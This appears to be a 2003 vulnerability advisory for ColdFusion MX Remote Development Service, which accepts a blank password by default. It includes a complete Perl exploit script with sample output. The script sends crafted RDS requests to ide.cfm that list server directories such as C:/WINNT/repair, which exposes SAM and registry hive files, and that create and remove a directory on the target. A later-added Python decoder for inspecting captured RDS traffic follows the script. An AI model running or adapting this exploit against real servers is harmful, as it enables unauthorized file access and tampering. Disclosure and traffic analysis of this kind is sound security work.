Macromedia ColdFusion MX Remote Development Service Default NULL Password Vulnerability

Published: 2003-07-05
Updated: 2003-07-05
Severity: High
Threat: Remote unauthorized file access
Error type: Design error
Exploitation mode: Server mode
BUGTRAQ ID: 8110

Affected systems
Macromedia ColdFusion Server MX Professional

Detailed description
ColdFusion MX can be used to build powerful web applications and web services, and the new version supports J2EE application servers. ColdFusion MX can also expose a web application development service. ColdFusion RDS (Remote Development Service) lets developers access files and data and debug CFML code; developers use RDS from ColdFusion Studio, HomeSite+, and Dreamweaver MX to reach files and databases. When properly configured, RDS authenticates remote developers with a static password. By default, however, RDS requires no password at all, so anyone with an RDS-compatible development tool can access the CF server.

In addition, when talking to a ColdFusion MX server, the RDS service lets an attacker read files on the server without authorization.

Test code
#!/usr/bin/perl
# RDS_c_Dump.pl
# victim1@angrypacket.com
#
## BIG NOTE -> aka ( DISCLAIMER ): if you do something retarded with this code or modification of this code you are completely on your OWN,
# I or rs2112 take no responsibility for your stupid actions, A JUST BE KNOWN ! This is meant for administrators to protect themselves against
# attack and that's it.
#
## CF 6 MX Server does several things in order to get remote dir structure so we will need
# to recreate these functions. This is an "almost" complete emulation of a Dreamweaver client connection just FYI,
# in like one full HTTP/1.1 session within netcat.
#
# I would like to point out that the ASPSESSID never validates so you can change this on the fly.
#
# Also I would like to say Macromedia's phone support sucks ass, I called trying to be a nice guy ( to follow up on email ) and
# they attempted to belittle my intelligence on the phone.. . OH and yes I did email them several times with no response.
#
# You can Write as well, I have tested and this works fine. If you change the file to an *.exe it will attempt to become a
# 16bit DOS application on the remote box FYI.
#
# Requests are sent in this order to get a remote dir structure:
# NOTE: Create dir retrieval array.
#
# ANOTHER NOTE:
# Due to certain current situations I am not allowed to release full exploit code with ( READ, RETRIEVE, WRITE ) functions, I have fully working code,
# If you email me I will not send it to you, so basically don't bother.
#
# I'm sorry for being such a foil fart but hey, you understand I'm sure.
#
# Sample output:
# --------------------------------
# Vic7im1@cipher:~/Scripts/RDS_Sploit$ perl RDS_c_Dump.pl
#
# POST /CFIDE/main/ide.cfm?CFSRV=IDE&ACTION=BrowseDir_Studio HTTP/1.1
#
# Request String Value: 3:STR:15:C:/WINNT/repairSTR:1:*STR:0:
# Content-Length: 37
# Please wait.. ..
# HTTP/1.1 100 Continue
# Server: Microsoft-IIS/5.0
# Date: Tue, 01 Jul 2003 10:30:43 GMT
#
# HTTP/1.1 200 OK
# Server: Microsoft-IIS/5.0
# Date: Tue, 01 Jul 2003 10:30:43 GMT
# Connection: close
# Content-Type: text/html
#
# 50:2:F:11:autoexec.nt1:63:4383:0,02:F:9:config.nt1:64:25773:0,02:F:7:default1:66:1187843:0,02:F:10:ntuser.dat1:66:1187843:0,02:F:3:
# sam1:65:204803:0,02:F:12:secsetup.inf1:66:5735303:0,02:F:8:security1:65:286723:0,02:F:9:setup.log1:66:1551943:0,02:F:8:
# software1:67:65331203:0,02:F:6:system1:66:9748483:0,0
# Vic7im1@cipher:~/Scripts/RDS_Sploit$
# ----------------------------------

use strict;
use warnings;
use IO::Socket::INET;

## Dreamweaver string requests to ide.cfm
## --------------------------------------
#1:  3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:             Content-Length: 46
#2:  3:STR:7:C:/_mm/STR:1:*STR:0:                                 Content-Length: 28
#3:  3:STR:6:C:/_mmSTR:9:ExistenceSTR:0:STR:0:STR:0:              Content-Length: 47
#4:  3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:             Content-Length: 46
#5:  3:STR:10:C:/_notes/STR:1:*STR:0:                             Content-Length: 32
#6:  5:STR:9:C:/_notesSTR:9:ExistenceSTR:0:STR:0:STR:0            Content-Length: 50
#7:  3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:             Content-Length: 46
#8:  5:STR:12:C:/XYIZNWSK/STR:6:CreateSTR:0:STR:0:STR:0:          Content-Length: 51
#9:  3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:             Content-Length: 46
#10: 3:STR:3:C:/STR:1:*STR:0:                                     Content-Length: 24
#11: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:             Content-Length: 46
#12: 5:STR:11:C:/XYIZNWSKSTR:9:ExistenceSTR:0:STR:0:STR:0:        Content-Length: 53
#13: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:             Content-Length: 46
#14: 5:STR:11:C:/XYIZNWSKSTR:9:ExistenceSTR:0:STR:0:STR:0:        Content-Length: 53
#15: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:             Content-Length: 46
#16: 5:STR:11:C:/XYIZNWSKSTR:6:RemoveSTR:0:STR:0:DSTR:0:          Content-Length: 51
#17: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:             Content-Length: 46
#18: 3:STR:8:C:/WINNTSTR:1:*STR:0:                                Content-Length: 29
#19: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:             Content-Length: 46
#20: 3:STR:15:C:/WINNT/repairSTR:1:*STR:0:                        Content-Length: 37
# Static Content-Length: $string_val. If you plan on leaving C:\WINNT\repair you will need to know
# the $string_val (the header must match the byte length of the request string exactly).

# Content-Length headers, one per request string below (same order, same index).
my @clength = (
    "Content-Length: 46",
    "Content-Length: 28",
    "Content-Length: 47",
    "Content-Length: 46",
    #"Content-Length: 32",
    #"Content-Length: 50",
    "Content-Length: 46",
    "Content-Length: 51",
    "Content-Length: 46",
    "Content-Length: 24",
    "Content-Length: 46",
    "Content-Length: 53",
    "Content-Length: 46",
    "Content-Length: 53",
    "Content-Length: 46",
    "Content-Length: 51",
    "Content-Length: 46",
    "Content-Length: 29",
    "Content-Length: 46",
    "Content-Length: 37",
);

# Request bodies, paired by index with @clength.
my @rarray = (
    "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
    "3:STR:7:C:/_mm/STR:1:*STR:0:",
    "3:STR:6:C:/_mmSTR:9:ExistenceSTR:0:STR:0:STR:0:",
    "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
    #"3:STR:10:C:/_notes/STR:1:*STR:0:",
    #"5:STR:9:C:/_notesSTR:9:ExistenceSTR:0:STR:0:STR:0",
    "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
    "5:STR:12:C:/XYIZNWSK/STR:6:CreateSTR:0:STR:0:STR:0:",
    "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
    "3:STR:3:C:/STR:1:*STR:0:",
    "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
    "5:STR:11:C:/XYIZNWSKSTR:9:ExistenceSTR:0:STR:0:STR:0:",
    "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
    "5:STR:11:C:/XYIZNWSKSTR:9:ExistenceSTR:0:STR:0:STR:0:",
    "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
    "5:STR:11:C:/XYIZNWSKSTR:6:RemoveSTR:0:STR:0:DSTR:0:",
    "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
    # The original listed "3:STR:8:C:/WINNTSTR:1:*STR*STR:0:" here, which is 33 bytes and does
    # not match its own "Content-Length: 29"; the 29-byte form below matches the header.
    "3:STR:8:C:/WINNTSTR:1:*STR:0:",
    "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
    "3:STR:15:C:/WINNT/repairSTR:1:*STR:0:",
);

system("clear");

# change target addy below.
my $TARGET = "192.168.0.100";
my $PORT   = "80";
my $STRING = "C:/WINNT/repair";   # unused: the path travels inside each request string above
my $POST   = "POST /CFIDE/main/ide.cfm?CFSRV=IDE&ACTION=BrowseDir_Studio HTTP/1.1\r\n";

print "Generating Socket with Array Directory Values.\n";

# Requests and headers are paired by index, so walk them once instead of a nested loop.
for my $i ( 0 .. $#rarray ) {
    gen_sock( $TARGET, $PORT, $rarray[$i], $clength[$i] );
}

sub gen_sock {
    my ( $target, $port, $request, $clength ) = @_;
    my $sock = IO::Socket::INET->new(
        PeerAddr => $target,
        PeerPort => $port,
        Proto    => 'tcp',
    ) or die "Socket Could not be established ! $!";

    print "Target: $target:$port\n";
    print "$POST\n";
    print "Request String Value: $request\n";
    print "$clength\n";
    print "Please wait.. ..\n";

    # One HTTP/1.1 request framed exactly like the Dreamweaver RDS client.
    print $sock $POST;
    print $sock "Content-Type: application/x-ColdFusionIDE\r\n";
    print $sock "User-Agent: Dreamweaver-RDS-SCM1.00\r\n";
    print $sock "Host: $target\r\n";
    print $sock "$clength\r\n";
    print $sock "Connection: Keep-Alive\r\n";
    print $sock "Cache-Control: no-cache\r\n";
    print $sock "Cookie: ASPSESSIONIDQQQQGLDK=LPIHIKCAECKACDGPJCOLOAOJ\r\n";
    print $sock "\r\n";
    print $sock $request;

    # lets return and print data to term
    while ( my $response = <$sock> ) {
        chomp $response;
        print "$response\n";
    }
    close $sock;
}

+----------- -- - + disclaimer +-------- -- -
READ IN THE SCRIPT. Oh and Happy 4th of July !
- -- -------------------------
#EOT

Solution
None available yet.

Related information
rs2112 <rs2112@hushmail.com> and Victim1 <victim1@angrypacket.com>.
Reference: http://sec.angrypacket.com/advisories/0006_AP.CF-rds-dump.txt
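As an added example (not part of the advisory or the authors' script), a Python decoder for the two RDS encodings quoted above, meant for reviewing captured ide.cfm request bodies and BrowseDir responses in web logs or packet captures: the "N:STR:len:value" request framing and the untyped "len:value" listing. The five-field layout of a listing entry and the field names I give them are my reading of the sample, not documented behaviour.

```python
import re
from typing import Dict, List

# Sample bodies constructed from the request strings and BrowseDir response quoted above.
BROWSE_REQ = "3:STR:15:C:/WINNT/repairSTR:1:*STR:0:"
CREATE_REQ = "5:STR:12:C:/XYIZNWSK/STR:6:CreateSTR:0:STR:0:STR:0:"
REMOVE_REQ = "5:STR:11:C:/XYIZNWSKSTR:6:RemoveSTR:0:STR:0:DSTR:0:"  # stray 'D' breaks the framing
BROWSE_RESP = (
    "50:2:F:11:autoexec.nt1:63:4383:0,02:F:9:config.nt1:64:25773:0,02:F:7:default"
    "1:66:1187843:0,02:F:10:ntuser.dat1:66:1187843:0,02:F:3:sam1:65:204803:0,02:F:12:"
    "secsetup.inf1:66:5735303:0,02:F:8:security1:65:286723:0,02:F:9:setup.log1:66:"
    "1551943:0,02:F:8:software1:67:65331203:0,02:F:6:system1:66:9748483:0,0"
)
_COUNT = re.compile(r"(\d+):")   # item count, and the bare 'len:' prefix used in listings
_STR = re.compile(r"STR:(\d+):")  # typed 'STR:len:' prefix used in requests

def _items(body: str, prefix: re.Pattern) -> List[str]:
    """Decode 'N:' followed by exactly N length-prefixed items; any framing slip raises."""
    m = _COUNT.match(body)
    if not m:
        raise ValueError("missing item count")
    n, pos, out = int(m.group(1)), m.end(), []
    for idx in range(n):
        m = prefix.match(body, pos)
        if not m:
            raise ValueError(f"item {idx}: no length prefix at offset {pos}")
        length, pos = int(m.group(1)), m.end()
        out.append(body[pos:pos + length])
        pos += length
    if pos != len(body):  # also catches a declared length that overran the body
        raise ValueError(f"{len(body) - pos} trailing byte(s) after item {n - 1}")
    return out

def parse_rds_request(body: str) -> Dict[str, object]:
    """Item 1 is the path, item 2 the operation: '*' lists a directory, otherwise
    Create/Remove/Existence as in the advisory's captured Dreamweaver session."""
    items = _items(body, _STR)
    op = "BrowseDir" if items[1] == "*" else items[1]
    return {"path": items[0], "op": op, "items": len(items)}

def parse_rds_listing(body: str) -> List[Dict[str, object]]:
    """The BrowseDir reply is untyped 'len:value' items, five per entry in the sample
    (a marker, the name, a flag, the size, a trailing '0,0'); field names are assumptions."""
    items = _items(body, _COUNT)
    if len(items) % 5:
        raise ValueError("listing is not a multiple of five items")
    return [{"marker": items[i], "name": items[i + 1], "flag": items[i + 2],
             "size": int(items[i + 3]), "tail": items[i + 4]} for i in range(0, len(items), 5)]
```

Feeding the captured Remove request through the parser fails on the stray byte before the fourth item, which matches the Content-Length arithmetic in the script comments: a strict decoder is how such a malformed capture shows up in review.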